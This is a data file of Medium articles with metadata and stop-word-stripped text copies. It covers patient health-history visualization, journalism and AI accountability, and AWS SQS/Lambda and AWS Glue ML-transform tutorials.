Unnamed: 0
int64
0
192k
title
stringlengths
1
200
text
stringlengths
10
100k
url
stringlengths
32
885
authors
stringlengths
2
392
timestamp
stringlengths
19
32
tags
stringlengths
6
263
info
stringlengths
45
90.4k
3,800
It’s Complicated
It’s Complicated Visualizing complex health histories & symptoms for two patients with rare and mystery conditions I recently worked with a smart, well-spoken patient, E., to put together a visual summary of her health. Unlike many others I’ve worked with, she was not looking for answers or a new diagnosis; she was motivated because she was starting the application process for a new service dog, and she needed to demonstrate her physical constraints and daily needs. She also had a complex medical history, with multiple chronic conditions, injuries, surgeries and procedures, and she wanted to see everything in one place for the first time. I went through my standard process of gathering her information, talking through her story with her, and creating visuals to represent the conversation. I then created a detailed timeline and symptom map, with an emphasis on her two longstanding conditions, Cryoglobulinemia and Ehlers-Danlos Syndrome (EDS). Both of these conditions are considered ‘rare diseases’ — meaning each one affects fewer than 200,000 Americans at any given time. A quick aside with some definitions: Cryoglobulinemia is the presence of abnormal proteins in the blood, and symptoms often include skin lesions and purple spots, joint pain, peripheral neuropathy (in other words burning or tingling in hands and feet), and more. EDS is a connective tissue disorder “generally characterized by joint hypermobility (joints that stretch further than normal), skin hyperextensibility (skin that can be stretched further than normal), and tissue fragility” (source: Ehlers-Danlos Society website). In addition to these two key diagnoses, E. also had Dysautonomia, an issue with her autonomic nervous system that causes fast heart rate, lightheadedness on standing, inability to regulate sweating, and more. All together, these three conditions caused E. a whole host of symptoms and injuries, many stretching back to her childhood. She’d had six broken ankles between age 10 and 15; at one point both of her ankles were broken at the same time. She estimated she’d had close to 50 surgeries since 1985. It was a lot to look back on, and it made for a very full timeline, as you can see below (most words and dates removed for privacy).
https://medium.com/pictal-health/its-complicated-60b2cb9c2398
['Katie Mccurdy']
2019-03-13 12:40:04.849000+00:00
['Design', 'Healthcare', 'Patient Experience', 'Health', 'Data Visualization']
Title It’s ComplicatedContent It’s Complicated Visualizing complex health history symptom two patient rare mystery condition recently worked smart wellspoken patient E put together visual summary health Unlike many others I’ve worked looking answer new diagnosis motivated starting application process new service dog needed demonstrate physical constraint daily need also complex medical history multiple chronic condition injury surgery procedure wanted see everything one place first time went standard process gathering information talking story creating visuals represent conversation created detailed timeline symptom map emphasis two longstanding condition Cryoglobulinemia EhlersDanlos Syndrome EDS condition considered ‘rare diseases’ — meaning one affect fewer 200000 Americans given time quick aside definition Cryoglobulinemia presence abnormal protein blood symptom often include skin lesion purple spot joint pain peripheral neuropathy word burning tingling hand foot EDS connective tissue disorder “generally characterized joint hypermobility joint stretch normal skin hyperextensibility skin stretched normal tissue fragility” source EhlersDanlos Society website addition two key diagnosis E also Dysautonomia issue autonomic nervous system cause fast heart rate lightheadedness standing inability regulate sweating together three condition caused E whole host symptom injury many stretching back childhood She’d six broken ankle age 10 15 one point ankle broken time estimated she’d close 50 surgery since 1985 lot look back made full timeline see word date removed privacyTags Design Healthcare Patient Experience Health Data Visualization
3,801
What is the Role of Journalists in Holding Artificial Intelligence Accountable?
What is the Role of Journalists in Holding Artificial Intelligence Accountable? The Wall Street Journal is experimenting with a new approach for reporting how smart algorithms work, beyond simply describing them. Image Credit: Gabriel Gianordoli/ WSJ Journalists, who routinely ask questions of their sources, should also be asking questions about an algorithm’s methodology. The rules created for algorithms need to be explicit and understood. The Wall Street Journal has been experimenting with a new approach to explain how AI works by letting readers experiment with it. “Interactive graphics can provide insights into how algorithms work in a way beyond simply describing its output. They can do this by acting as safe spaces in which readers can experiment with different inputs and immediately see how the computer might respond to it,” said deputy graphics director Elliot Bentley. “To make this accessible and non-intimidating, it’s important to design a straightforward interface with minimal controls, and also provide informative and immediate feedback,” Bentley added. Image Credit: Gabriel Gianordoli/ WSJ The most recent example of letting readers experiment with algorithms is our story, “What Your Writing Says About You,”published as part of the Leadership issue of Journal Reports. The news experience offers an interface allowing people to enter text such as an essay, cover letter, blog post or business email and receive results from algorithms that rate the content by different parameters. By including detailed methodology and source notes, we allow our audiences to understand how machine learning and natural language processing can determine context, language mastery, meaning and even your mood from the choice of words. “These explorable explainers allow us to not only go deeper, but also to give the readers a perspective on subjects like AI that we can’t give them by simply writing more great stories. It immerses them in a unique way in a subject we know they care about,” said Journal Reports editor Larry Rout. In a previous Graphics project entitled “How Facial Recognition Software Works,” Bentley explained that readers need only to enable their webcam and begin moving their head around in order to play with a facial-recognition algorithm. It then provides clear, real-time feedback using a series of visual overlays. Another example of this is “Build Your Own Trading Bot” in which we attempted to demystify algorithmic trading by designing a user-friendly interface and a rewarding feedback loop to encourage readers to experiment with the mechanics. How Facial Recognition Software Works. Credit: Elliot Bentley/WSJ Journalism and algorithmic accountability We might not notice it, but artificial intelligence affects multiple parts of our lives. These algorithms decide whether an individual qualifies for a loan, whether a resume is seen by a recruiter, which seat a passenger is assigned on an airplane, which advertisements shoppers see online and what information on the internet is shown to users. Transparency of the data that feeds these processes is crucial both for consumers to better understand what they encounter and for organizations to shape their business strategy. Given the challenging nature of auditing algorithms, it’s important to consider how the practice of journalism can be leveraged to hold AI systems accountable. In his forthcoming book, Northwestern University professor of computational journalism Nicholas Diakopoulos introduces the notion of algorithmic accountability reporting as an approach to highlight influences that computer programs exercise in society. “Operating at scale and often affecting large groups of people, algorithms make consequential and sometimes contestable decisions in an increasing range of domains throughout the public and private sectors. In response, a distinct beat in journalism is emerging to investigate the societal power exerted through such algorithms. There are various newsworthy angles on algorithms including discrimination and unfairness, errors and mistakes, social and legal norm violations, and human misuse. Reverse engineering and auditing techniques can be used to elucidate the contours of algorithmic power,” Diakopoulos explained. The “black box” problem in AI When certain decisions are derived through an algorithm, it’s often hard to pinpoint why or how an automatic output was derived. This introduces the problem of the “black box” algorithm whereby correlations are made without rules set by humans. This term is often used as a metaphor for algorithms in which the process to reach a certain outcome cannot be seen in full. “Auditing algorithms is not for the faint of heart. Information deficits, expectation setting, limited legal access, and shifting dynamic targets can all hamper an investigation. Working in teams, methods specialists working with domain experts can, however, overcome these obstacles and publish important stories about algorithms in society,” Diakopoulos added. It’s indeed relevant to dissect how computers make decisions and to comprehend how smart systems are created. For example, the AI powering the set of analysis in “What Your Writing Says About You” is provided by Factbase, an AI company which makes its algorithms open source, peer reviewed, and available for examination. In “What Your Writing Says about You,” we explain the underlying scientific methodology behind each output, including the Flesch-Kincaid Grade Level — developed in 1975 by the Department of Defense to review readability level of military materials — as well as the Treebank methodology created by the University of Pennsylvania to evaluate linguistic structure of text. “It’s important, as much as is possible, to understand the parameters under which the AI or algorithms arrived at its conclusions. What parameters it examines, and how it analyzes it, provides transparency to its thinking, per se, which in turn makes it more clear how it decides what it decides,” said Bill Frischling, founder of FactBase. This issue is prevalent in artificial intelligence, partly because the systems are not necessarily designed to explain how they do certain things, but to just do them. This is also a byproduct of algorithms learning by themselves; they make causal links not based on human instruction but on self-identified patterns. Newsroom collaboration The Wall Street Journal’s news hub in New York City. There are, of course, technical gaps to developing this type of reporting on algorithms, which can be addressed by working cross-functionally with data scientists, computational journalists and technologists. Increasingly, it’s important to foster a culture of collaboration throughout the newsroom and bring multiple perspectives into the process of story planning and development. “A project such as this which taps so many areas of expertise and aligns them is a pleasure to be part of. What started with WSJ Lab’s original outline of possibilities was honed by a team of editors at Journal Reports to focus on specifically what our writing reveals about us. Our interactives team wrangled the code, user interface and graphic visualization,” said news editor Demetria Gallegos. “Then, privacy experts from our legal and data teams, our social and off-platform colleagues and homepage and mobile editors weighed in to ensure the experience is optimized for every reader,” Gallegos added. The odds for a successful collaboration can be increased if the organization is able to foster an environment where journalists are encouraged to test new ideas, to seek feedback, and to share best practices even if experiments are unsuccessful. Building this “feedback loop” can enable news professionals to mitigate the uncertainty of experimentation as well as inform the broader newsroom strategy. “When we are thinking about how to create an innovative news experience, we have to consider how readers already ingest news — and how much further they are willing to go. In our discussions during the story planning process, we ran through various scenarios of how the tool could work, based on different criteria. We then ruled out things that would require too much time or too many steps. We also had to be sensitive to how much information people are willing to disclose. We designed this interactive story to be fun enough to get readers in, engaging enough to have them read through it, take the quiz, play the game etc. And if they end up sharing their results on social media, we know we did it right,” explained news editor Cristina Lourosa. Journalistic standards and technological evolution Just because a certain result came from a computer, it doesn’t mean it’s right. Artificial intelligence is programmed by humans and consequently it can make mistakes. The ethical considerations inherent to using AI are far and wide. “Understanding the source of information whether it’s from a person or algorithm is not only crucial for the news industry but as well, for democracy,” said Kourosh Houshmand, a computational journalist at Columbia Journalism School. The practice of journalism is about questioning the world around us, and that same principle still applies even when a piece of software played a role in a particular outcome such as determining the price of a product, evaluating how a person feels based on their writing or selecting a candidate for a job interview. “We can help readers understand how technology works by explaining how the algorithms get their results and then pointing to the source documents and formulas that power the calculations,” said graphics reporter Nigel Chiwaya. An effective way to understand AI is to experiment with it, comprehend the nuances of how algorithms make decisions and how those decisions may affect our lives.
https://medium.com/the-wall-street-journal/what-is-the-role-of-journalists-in-holding-artificial-intelligence-accountable-9a6321e5a265
['Francesco Marconi']
2020-04-20 08:43:10.910000+00:00
['Algorithms', 'Artificial Intelligence', 'Journalism', 'Best Practices', 'Ethics']
Title Role Journalists Holding Artificial Intelligence AccountableContent Role Journalists Holding Artificial Intelligence Accountable Wall Street Journal experimenting new approach reporting smart algorithm work beyond simply describing Image Credit Gabriel Gianordoli WSJ Journalists routinely ask question source also asking question algorithm’s methodology rule created algorithm need explicit understood Wall Street Journal experimenting new approach explain AI work letting reader experiment “Interactive graphic provide insight algorithm work way beyond simply describing output acting safe space reader experiment different input immediately see computer might respond it” said deputy graphic director Elliot Bentley “To make accessible nonintimidating it’s important design straightforward interface minimal control also provide informative immediate feedback” Bentley added Image Credit Gabriel Gianordoli WSJ recent example letting reader experiment algorithm story “What Writing Says You”published part Leadership issue Journal Reports news experience offer interface allowing people enter text essay cover letter blog post business email receive result algorithm rate content different parameter including detailed methodology source note allow audience understand machine learning natural language processing determine context language mastery meaning even mood choice word “These explorable explainers allow u go deeper also give reader perspective subject like AI can’t give simply writing great story immerses unique way subject know care about” said Journal Reports editor Larry Rout previous Graphics project entitled “How Facial Recognition Software Works” Bentley explained reader need enable webcam begin moving head around order play facialrecognition algorithm provides clear realtime feedback using series visual overlay Another example “Build Trading Bot” attempted demystify algorithmic trading designing userfriendly interface rewarding feedback loop encourage reader experiment mechanic Facial Recognition Software Works Credit Elliot BentleyWSJ Journalism algorithmic accountability might notice artificial intelligence affect multiple part life algorithm decide whether individual qualifies loan whether resume seen recruiter seat passenger assigned airplane advertisement shopper see online information internet shown user Transparency data feed process crucial consumer better understand encounter organization shape business strategy Given challenging nature auditing algorithm it’s important consider practice journalism leveraged hold AI system accountable forthcoming book Northwestern University professor computational journalism Nicholas Diakopoulos introduces notion algorithmic accountability reporting approach highlight influence computer program exercise society “Operating scale often affecting large group people algorithm make consequential sometimes contestable decision increasing range domain throughout public private sector response distinct beat journalism emerging investigate societal power exerted algorithm various newsworthy angle algorithm including discrimination unfairness error mistake social legal norm violation human misuse Reverse engineering auditing technique used elucidate contour algorithmic power” Diakopoulos explained “black box” problem AI certain decision derived algorithm it’s often hard pinpoint automatic output derived introduces problem “black box” algorithm whereby correlation made without rule set human term often used metaphor algorithm process reach certain outcome cannot seen full “Auditing algorithm faint heart Information deficit expectation setting limited legal access shifting dynamic target hamper investigation Working team method specialist working domain expert however overcome obstacle publish important story algorithm society” Diakopoulos added It’s indeed relevant dissect computer make decision comprehend smart system created example AI powering set analysis “What Writing Says You” provided Factbase AI company make algorithm open source peer reviewed available examination “What Writing Says You” explain underlying scientific methodology behind output including FleschKincaid Grade Level — developed 1975 Department Defense review readability level military material — well Treebank methodology created University Pennsylvania evaluate linguistic structure text “It’s important much possible understand parameter AI algorithm arrived conclusion parameter examines analyzes provides transparency thinking per se turn make clear decides decides” said Bill Frischling founder FactBase issue prevalent artificial intelligence partly system necessarily designed explain certain thing also byproduct algorithm learning make causal link based human instruction selfidentified pattern Newsroom collaboration Wall Street Journal’s news hub New York City course technical gap developing type reporting algorithm addressed working crossfunctionally data scientist computational journalist technologist Increasingly it’s important foster culture collaboration throughout newsroom bring multiple perspective process story planning development “A project tap many area expertise aligns pleasure part started WSJ Lab’s original outline possibility honed team editor Journal Reports focus specifically writing reveals u interactives team wrangled code user interface graphic visualization” said news editor Demetria Gallegos “Then privacy expert legal data team social offplatform colleague homepage mobile editor weighed ensure experience optimized every reader” Gallegos added odds successful collaboration increased organization able foster environment journalist encouraged test new idea seek feedback share best practice even experiment unsuccessful Building “feedback loop” enable news professional mitigate uncertainty experimentation well inform broader newsroom strategy “When thinking create innovative news experience consider reader already ingest news — much willing go discussion story planning process ran various scenario tool could work based different criterion ruled thing would require much time many step also sensitive much information people willing disclose designed interactive story fun enough get reader engaging enough read take quiz play game etc end sharing result social medium know right” explained news editor Cristina Lourosa Journalistic standard technological evolution certain result came computer doesn’t mean it’s right Artificial intelligence programmed human consequently make mistake ethical consideration inherent using AI far wide “Understanding source information whether it’s person algorithm crucial news industry well democracy” said Kourosh Houshmand computational journalist Columbia Journalism School practice journalism questioning world around u principle still applies even piece software played role particular outcome determining price product evaluating person feel based writing selecting candidate job interview “We help reader understand technology work explaining algorithm get result pointing source document formula power calculations” said graphic reporter Nigel Chiwaya effective way understand AI experiment comprehend nuance algorithm make decision decision may affect livesTags Algorithms Artificial Intelligence Journalism Best Practices Ethics
3,802
Scheduling tasks with AWS SQS and Lambda
Scheduling tasks with AWS SQS and Lambda Engineering@ZenOfAI Follow Feb 16 · 4 min read In this story, we will be learning a workaround for how to schedule or delay a message using AWS SQS despite its 15 minutes (900 seconds) upper limit. First let us understand some SQS attributes briefly. Firstly lets look at Delivery Delay. It lets you specify a delay between 0 and 900 seconds ( 15 minutes). When set, any message sent to the queue will only become visible to consumers after the configured delay period. Secondly Visibility Timeout, the time that a received message from a queue will be invisible to be received again unless it’s deleted from the queue. If you want to learn about dead letter queue and deduplication, you could follow my other article: Processing High Volume Big Data Concurrently with No Duplicates using AWS SQS. So, when a consumer receives a message, the message remains in the queue but is invisible for the duration of its visibility timeout, after which other consumers will be able to see the message. Ideally, the first consumer would handle and delete the message before the visibility timeout expires. The upper limit for visibility timeout is 12 hours. We could leverage this to schedule/delay a task. A typical combination would be SQS with Lambda where the invoked function executes the task. Usually, standard queues when enabled with lambda triggers have immediate consumption that means when a message is inserted into the standard queue the lambda function is invoked immediately with the message available in the event object. Note: If the lambda results in an error the message stays in the queue for further receive requests, otherwise it is deleted. That said, there could be 2 cases: A generic setup that can adapt to a range of time delays. A stand-alone setup built to handle only a fixed time delay. The idea is to insert a message into the queue with task details and time to execute(target time) and have the lambda do the dirty work. Case1: The Lambda function checks if target time equals current time, if so execute the task and message is deleted as the lambda executes without error else change the visibility timeout of that message in the queue with delta difference and raise an error leaving the message in the queue. Case2: The SQS’s default visibility timeout is configured with the required fixed time delay. The Lambda function checks if the difference of target time and current time equals fixed time delay, if so execute the task and message is deleted as the lambda executes without error else simply raise an error leaving the message untampered back in the queue. The message is retried after it’s visibility timeout which is the required fixed time delay and is executed. The problem with this approach is accuracy and scalability. Here’s the lambda code for case2: Processor.py import boto3 import json from datetime import datetime, timezone import dateutil.tz tz = dateutil.tz.gettz('US/Central') fixed_time_delay = 1 # change this value, be it hour, min, sec def lambda_handler(event, context): # TODO implement message = event['Records'][0] # print(message) result = json.loads(message['body']) task_details = result['task_details'] target_time = result['execute_at'] tt = datetime.strptime(target_time, "%d/%m/%Y, %H:%M %p CST") print(tt) t_now = datetime.now(tz) time_now = t_now.strftime("%d/%m/%Y, %H:%M %p CST") tn = datetime.strptime(time_now, "%d/%m/%Y, %H:%M %p CST") print(tn) delta_time = tn-tt print(delta_time) delta_in_whatever = #extract delay in hour, min, sec if delta_in_whatever == fixed_time_delay: # execute task logic print(task_details) else: raise e Conclusion: Scheduling tasks using SQS isn’t effective in all scenarios. You could use AWS step function’s wait state to achieve milliseconds accuracy, or Dynamo DB’s TTL feature to build an ad hoc scheduling mechanism, the choice of service used is largely dependent on the requirement. So, here’s a wonderful blog post that gives you a bigger picture of different ways to schedule a task on AWS. This story is authored by Koushik. Koushik is a software engineer specializing in AWS Cloud Services.
https://medium.com/zenofai/scheduling-tasks-with-aws-sqs-and-lambda-82bdcfbc0fd8
['Engineering Zenofai']
2020-02-20 14:14:17.090000+00:00
['Software Development', 'AWS Lambda', 'AWS', 'Cloud Computing']
Title Scheduling task AWS SQS LambdaContent Scheduling task AWS SQS Lambda EngineeringZenOfAI Follow Feb 16 · 4 min read story learning workaround schedule delay message using AWS SQS despite 15 minute 900 second upper limit First let u understand SQS attribute briefly Firstly let look Delivery Delay let specify delay 0 900 second 15 minute set message sent queue become visible consumer configured delay period Secondly Visibility Timeout time received message queue invisible received unless it’s deleted queue want learn dead letter queue deduplication could follow article Processing High Volume Big Data Concurrently Duplicates using AWS SQS consumer receives message message remains queue invisible duration visibility timeout consumer able see message Ideally first consumer would handle delete message visibility timeout expires upper limit visibility timeout 12 hour could leverage scheduledelay task typical combination would SQS Lambda invoked function executes task Usually standard queue enabled lambda trigger immediate consumption mean message inserted standard queue lambda function invoked immediately message available event object Note lambda result error message stay queue receive request otherwise deleted said could 2 case generic setup adapt range time delay standalone setup built handle fixed time delay idea insert message queue task detail time executetarget time lambda dirty work Case1 Lambda function check target time equal current time execute task message deleted lambda executes without error else change visibility timeout message queue delta difference raise error leaving message queue Case2 SQS’s default visibility timeout configured required fixed time delay Lambda function check difference target time current time equal fixed time delay execute task message deleted lambda executes without error else simply raise error leaving message untampered back queue message retried it’s visibility timeout required fixed time delay executed problem approach accuracy scalability Here’s lambda code case2 Processorpy import boto3 import json datetime import datetime timezone import dateutiltz tz dateutiltzgettzUSCentral fixedtimedelay 1 change value hour min sec def lambdahandlerevent context TODO implement message eventRecords0 printmessage result jsonloadsmessagebody taskdetails resulttaskdetails targettime resultexecuteat tt datetimestrptimetargettime dmY HM p CST printtt tnow datetimenowtz timenow tnowstrftimedmY HM p CST tn datetimestrptimetimenow dmY HM p CST printtn deltatime tntt printdeltatime deltainwhatever extract delay hour min sec deltainwhatever fixedtimedelay execute task logic printtaskdetails else raise e Conclusion Scheduling task using SQS isn’t effective scenario could use AWS step function’s wait state achieve millisecond accuracy Dynamo DB’s TTL feature build ad hoc scheduling mechanism choice service used largely dependent requirement here’s wonderful blog post give bigger picture different way schedule task AWS story authored Koushik Koushik software engineer specializing AWS Cloud ServicesTags Software Development AWS Lambda AWS Cloud Computing
3,803
Machine Learning based Fuzzy Matching using AWS Glue ML Transforms
Machine Learning Transforms in AWS Glue AWS Glue provides machine learning capabilities to create custom transforms to do Machine Learning based fuzzy matching to deduplicate and cleanse your data. For this we are going to use a transform named FindMatches. The FindMatches transform enables you to identify duplicate or matching records in your dataset, even when the records do not have a common unique identifier and no fields match exactly. This will not require writing any code or knowing how machine learning works. For more details about ML Transforms, please go through the docs. Creating a Machine Learning Transform with AWS Glue This article walks you through the actions to create and manage a machine learning (ML) transform using AWS Glue. I assume that you are familiar with using the AWS Glue console to add crawlers and jobs and edit scripts. You should also be familiar with finding and downloading files on the Amazon Simple Storage Service (Amazon S3) console. In case you are just starting out on AWS Glue, I have explained how to create an AWS Glue Crawler and Glue Job from scratch in one of my earlier articles. The source data used in this blog is a hypothetical file named customers_data.csv. A second file, label_file.csv, is an example of a labeling file that contains both matching and nonmatching records used to teach the transform. Step 1: Crawl the Data using AWS Glue Crawler At the outset, crawl the source data from the CSV file in S3 to create a metadata table in the AWS Glue Data Catalog. I created a crawler pointing to the source location (s3://bucketname/data/ml-transform/customers/). In case you are just starting out on the AWS Glue crawler, I have explained how to create one from scratch in one of my earlier articles. If you run this crawler, it creates a customers table in the specified database (ml-transform). Step 2: Add a Machine Learning Transform Next, add a machine learning transform that is based on the schema of your data source table created by the above crawler. Choose Worker type and Maximum capacity as per the requirements. 3. For Data source, choose the table that was created in the earlier step. In this, the table named customers in database ml-transform. 4. For Primary key, choose the primary key column for the table, email. Step 3: How to Teach Your Machine Learning Transform Next, teach the machine learning transform using the sample labeling file. You can’t use a machine language transform in an extract, transform, and load (ETL) job until its status is Ready for use. To get your transform ready, you must teach it how to identify matching and non-matching records by providing examples of matching and non-matching records. To teach your transform, you can Generate a label file, add labels, and then Upload label file. For this article, the label file I have used is label_file.csv On the AWS Glue console, in the navigation pane, choose ML Transforms. Choose the earlier created transform, and then choose Action, Teach. If you don’t have the label file, choose I do not have labels, you can Generate a label file, add labels, and then Upload label file. If you have the label file, choose I have labels, then choose Upload labelling file from S3. Choose an Amazon S3 path to the sample labeling file in the current AWS Region. (s3://bucketname/data/ml-transform/labels/label_file.csv) with the option to overwrite existing labels. The labeling file must be located in S3 in the same Region as the AWS Glue console. When you upload a labeling file, a task is started in AWS Glue to add or overwrite the labels used to teach the transform how to process the data source. Step 4: Estimate the Quality of ML Transform What is Labeling? The act of labeling is creating a labeling file (such as in a spreadsheet) and adding identifiers, or labels, into the label column that identifies matching and non-matching records. It is important to have a clear and consistent definition of a match in your source data. AWS Glue learns from which records you designate as matches (or not) and uses your decisions to learn how to find duplicate records. Next, you can estimate the quality of your machine learning transform. The quality depends on how much labeling you have done. On the AWS Glue console, in the navigation pane, choose ML Transforms . . Choose the earlier created transform, and choose the Estimate quality tab. This tab displays the current quality estimates, if available, for the transform. Choose Estimate quality to start a task to estimate the quality of the transform. The accuracy of the quality estimate is based on the labeling of the source data. to start a task to estimate the quality of the transform. The accuracy of the quality estimate is based on the labeling of the source data. Navigate to the History tab. In this pane, task runs are listed for the transform, including the Estimating quality task. For more details about the run, choose Logs. Check that the run status is Succeeded when it finishes. Step 5: Create and run a Job with ML Transform In this step, we use your machine learning transform to add and run a job in AWS Glue. When the transform is Ready for use, we can use it in an ETL job. On the AWS Glue console, in the navigation pane, choose Jobs. Choose Add job. In case you are just starting out on AWS Glue ETL Job, I have explained how to create one from scratch in one of my earlier articles. For Name , choose the example job in this tutorial, ml-transform . , choose the example job in this tutorial, . Choose an IAM role that has permission to access Amazon S3 and AWS Glue API operations. that has permission to access Amazon S3 and AWS Glue API operations. For ETL language , choose Spark 2.2, Python 2. Machine learning transforms are currently not supported for Spark 2.4. , choose Spark 2.2, Python 2. Machine learning transforms are currently not supported for Spark 2.4. For Data source , choose the table created in Step 1 . The data source you choose must match the machine learning transform data source schema. , choose the table created in . The data source you choose must match the machine learning transform data source schema. For Transform type, choose to Find matching records to create a job using a machine learning transform. For Transform , choose transform created in step 2, the machine learning transform used by the job. , choose transform created in step 2, the machine learning transform used by the job. For Create tables in your data target, choose to create tables with the following properties. Data store type — Amazon S3 Format — CSV Compression type — None Target path — The Amazon S3 path where the output of the job is written (in the current console AWS Region) Choose Save job and edit script to display the script editor page. The script looks like the following. After you edit the script, choose Save. import sys from awsglue.transforms import * from awsglue.utils import getResolvedOptions from pyspark.context import SparkContext from awsglue.context import GlueContext from awsglue.job import Job from awsglueml.transforms import FindMatches args = getResolvedOptions(sys.argv, ['JOB_NAME']) ## @params : [JOB_NAME]args = getResolvedOptions(sys.argv, ['JOB_NAME']) glueContext = GlueContext(sc) spark = glueContext.spark_session job = Job(glueContext) job.init(args['JOB_NAME'], args) ## ## ## ## datasource0 = glueContext.create_dynamic_frame.from_catalog(database = "ml_transforms", table_name = "customers", transformation_ctx = "datasource0") ## ## ## ## resolvechoice1 = ResolveChoice.apply(frame = datasource0, choice = "MATCH_CATALOG", database = "ml_transforms", table_name = "customers", transformation_ctx = "resolvechoice1") ## ## ## ## findmatches2 = FindMatches.apply(frame = resolvechoice1, transformId = "eacb9a1ffbc686f61387f63", transformation_ctx = "findmatches2") ## ## ## ## datasink3 = glueContext.write_dynamic_frame.from_options(frame = findmatches2, connection_type = "s3", connection_options = {"path": "s3:/<bucket-name>/data/ml-transforms/output/"}, format = "csv", transformation_ctx = "datasink3") job.commit() sc = SparkContext()glueContext = GlueContext(sc)spark = glueContext.spark_sessionjob = Job(glueContext)job.init(args['JOB_NAME'], args)## @type : DataSource## @args : [database = "ml_transforms", table_name = "customers", transformation_ctx = "datasource0"]## @return : datasource0## @inputs : []datasource0 = glueContext.create_dynamic_frame.from_catalog(database = "ml_transforms", table_name = "customers", transformation_ctx = "datasource0")## @type : ResolveChoice## @args : [choice = "MATCH_CATALOG", database = "ml_transforms", table_name = "customers", transformation_ctx = "resolvechoice1"]## @return : resolvechoice1## @inputs : [frame = datasource0]resolvechoice1 = ResolveChoice.apply(frame = datasource0, choice = "MATCH_CATALOG", database = "ml_transforms", table_name = "customers", transformation_ctx = "resolvechoice1")## @type : FindMatches## @args : [transformId = "eacb9a1ffbc686f61387f63", emitFusion = false, survivorComparisonField = " ", transformation_ctx = "findmatches2"]## @return : findmatches2## @inputs : [frame = resolvechoice1]findmatches2 = FindMatches.apply(frame = resolvechoice1, transformId = "eacb9a1ffbc686f61387f63", transformation_ctx = "findmatches2")## @type : DataSink## @args : [connection_type = "s3", connection_options = {"path": "s3://bucket-name/data/ml-transforms/output/"}, format = "csv", transformation_ctx = "datasink3"]## @return : datasink3## @inputs : [frame = findmatches2]datasink3 = glueContext.write_dynamic_frame.from_options(frame = findmatches2, connection_type = "s3", connection_options = {"path": "s3:/ /data/ml-transforms/output/"}, format = "csv", transformation_ctx = "datasink3")job.commit() Choose Run job to start the job run. Check the status of the job in the jobs list. When the job finishes, in the ML transform, History tab, there is a new Run ID row added of type ETL job. Navigate to the Jobs, History tab. In this pane, job runs are listed. For more details about the run, choose Logs. Check that the run status is Succeeded when it finishes. Step 6: Verify Output Data from Amazon S3 in Amazon Athena In this step, check the output of the job run in the Amazon S3 bucket that you chose when you added the job. You can create a table in the Glue Data catalog pointing to the output location, just like the way we crawled the source data in Step 1. You can then query the data in Athena. However, the Find matches transform adds another column named match_id to identify matching records in the output. Rows with the same match_id are considered matching records. If you don’t find any matches, you can continue to teach the transform by adding more labels. Thanks for the read and look forward to your comments This story is authored by PV Subbareddy. Subbareddy is a Big Data Engineer specializing on AWS Big Data Services and Apache Spark Ecosystem.
https://medium.com/zenofai/machine-learning-based-fuzzy-matching-using-aws-glue-ml-transforms-761ad208bdbe
['Engineering Zenofai']
2019-11-21 09:46:35.064000+00:00
['Cloud Computing', 'Machine Learning', 'Spark', 'AWS', 'Software Development']
Title Machine Learning based Fuzzy Matching using AWS Glue ML TransformsContent Machine Learning Transforms AWS Glue AWS Glue provides machine learning capability create custom transforms Machine Learning based fuzzy matching deduplicate cleanse data going use transform named FindMatches FindMatches transform enables identify duplicate matching record dataset even record common unique identifier field match exactly require writing code knowing machine learning work detail ML Transforms please go doc Creating Machine Learning Transform AWS Glue article walk action create manage machine learning ML transform using AWS Glue assume familiar using AWS Glue console add crawler job edit script also familiar finding downloading file Amazon Simple Storage Service Amazon S3 console case starting AWS Glue explained create AWS Glue Crawler Glue Job scratch one earlier article source data used blog hypothetical file named customersdatacsv second file labelfilecsv example labeling file contains matching nonmatching record used teach transform Step 1 Crawl Data using AWS Glue Crawler outset crawl source data CSV file S3 create metadata table AWS Glue Data Catalog created crawler pointing source location s3bucketnamedatamltransformcustomers case starting AWS Glue crawler explained create one scratch one earlier article run crawler creates customer table specified database mltransform Step 2 Add Machine Learning Transform Next add machine learning transform based schema data source table created crawler Choose Worker type Maximum capacity per requirement 3 Data source choose table created earlier step table named customer database mltransform 4 Primary key choose primary key column table email Step 3 Teach Machine Learning Transform Next teach machine learning transform using sample labeling file can’t use machine language transform extract transform load ETL job status Ready use get transform ready must teach identify matching nonmatching record providing example matching nonmatching record teach transform Generate label file add label Upload label file article label file used labelfilecsv AWS Glue console navigation pane choose ML Transforms Choose earlier created transform choose Action Teach don’t label file choose label Generate label file add label Upload label file label file choose label choose Upload labelling file S3 Choose Amazon S3 path sample labeling file current AWS Region s3bucketnamedatamltransformlabelslabelfilecsv option overwrite existing label labeling file must located S3 Region AWS Glue console upload labeling file task started AWS Glue add overwrite label used teach transform process data source Step 4 Estimate Quality ML Transform Labeling act labeling creating labeling file spreadsheet adding identifier label label column identifies matching nonmatching record important clear consistent definition match source data AWS Glue learns record designate match us decision learn find duplicate record Next estimate quality machine learning transform quality depends much labeling done AWS Glue console navigation pane choose ML Transforms Choose earlier created transform choose Estimate quality tab tab display current quality estimate available transform Choose Estimate quality start task estimate quality transform accuracy quality estimate based labeling source data start task estimate quality transform accuracy quality estimate based labeling source data Navigate History tab pane task run listed transform including Estimating quality task detail run choose Logs Check run status Succeeded finish Step 5 Create run Job ML Transform step use machine learning transform add run job AWS Glue transform Ready use use ETL job AWS Glue console navigation pane choose Jobs Choose Add job case starting AWS Glue ETL Job explained create one scratch one earlier article Name choose example job tutorial mltransform choose example job tutorial Choose IAM role permission access Amazon S3 AWS Glue API operation permission access Amazon S3 AWS Glue API operation ETL language choose Spark 22 Python 2 Machine learning transforms currently supported Spark 24 choose Spark 22 Python 2 Machine learning transforms currently supported Spark 24 Data source choose table created Step 1 data source choose must match machine learning transform data source schema choose table created data source choose must match machine learning transform data source schema Transform type choose Find matching record create job using machine learning transform Transform choose transform created step 2 machine learning transform used job choose transform created step 2 machine learning transform used job Create table data target choose create table following property Data store type — Amazon S3 Format — CSV Compression type — None Target path — Amazon S3 path output job written current console AWS Region Choose Save job edit script display script editor page script look like following edit script choose Save import sys awsgluetransforms import awsglueutils import getResolvedOptions pysparkcontext import SparkContext awsgluecontext import GlueContext awsgluejob import Job awsgluemltransforms import FindMatches args getResolvedOptionssysargv JOBNAME params JOBNAMEargs getResolvedOptionssysargv JOBNAME glueContext GlueContextsc spark glueContextsparksession job JobglueContext jobinitargsJOBNAME args datasource0 glueContextcreatedynamicframefromcatalogdatabase mltransforms tablename customer transformationctx datasource0 resolvechoice1 ResolveChoiceapplyframe datasource0 choice MATCHCATALOG database mltransforms tablename customer transformationctx resolvechoice1 findmatches2 FindMatchesapplyframe resolvechoice1 transformId 